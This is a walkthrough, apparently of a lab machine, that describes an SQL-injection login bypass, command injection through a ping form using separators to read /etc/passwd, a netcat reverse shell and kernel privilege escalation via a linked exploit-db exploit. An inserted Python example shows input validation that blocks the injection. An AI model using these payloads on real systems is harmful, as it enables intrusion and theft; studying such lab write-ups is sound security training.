Information gathering
Use netdiscover to gather information and find the target IP address.
The IP address of the target is 192.168.43.47.
Scan the ports with Nmap.
Vulnerability exploitation
Port 80 is open:
80/tcp open http Apache httpd 2.0.52 ((CentOS))
Trying the universal password ' or 1=1# logs in successfully.
After logging in, there is a form that executes the ping command.
This is clearly a command execution vulnerability.
In command execution, the common separators are | && || ;
Here we can use | or ; for command execution.
Test with cat /etc/passwd.
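The hardening side of the ping form described above, as an added example (not code from the original walkthrough): a Python handler that accepts only a bare IPv4 literal and runs ping without a shell, so the separators listed above are never interpreted. The function names are hypothetical and the sample inputs are constructed.

```python
import ipaddress
import subprocess

# Separators the walkthrough lists for chaining commands in the ping form.
SHELL_SEPARATORS = ("|", "&&", "||", ";")


def find_separators(user_input: str) -> list[str]:
    """Return the listed separators present in the input (for logging or alerting)."""
    return [sep for sep in SHELL_SEPARATORS if sep in user_input]


def build_ping_argv(user_input: str, count: int = 3) -> list[str]:
    """Build an argv list for ping; raise ValueError unless input is one IPv4 literal."""
    # IPv4Address parses the whole string, so a trailing "; cmd" or "| cmd" is rejected.
    addr = ipaddress.IPv4Address(user_input.strip())
    return ["ping", "-c", str(count), str(addr)]


def run_ping(user_input: str) -> str:
    """Run ping with no shell involved: the argv list is passed to exec directly."""
    argv = build_ping_argv(user_input)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return done.stdout


if __name__ == "__main__":
    # Constructed sample inputs: one valid address and two chained-command attempts.
    samples = (
        "192.168.43.47",
        "192.168.43.47; cat /etc/passwd",
        "192.168.43.47 | cat /etc/passwd",
    )
    for sample in samples:
        try:
            print("accepted:", build_ping_argv(sample))
        except ValueError:
            print("rejected:", repr(sample), "separators:", find_separators(sample))
```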
Next, use the command execution to spawn an interactive shell, while listening on port 2333 with nc.
This gives an interactive shell, but only with the privileges of the apache user.
Privilege escalation
The current user is apache. We need to escalate to root.
Check the current system version, then search for exploits for Linux 2.6.9:
searchsploit linux 2.6.9
https://www.exploit-db.com/download/9542.c
Use the exploit 9542.c.
Privilege escalation succeeded.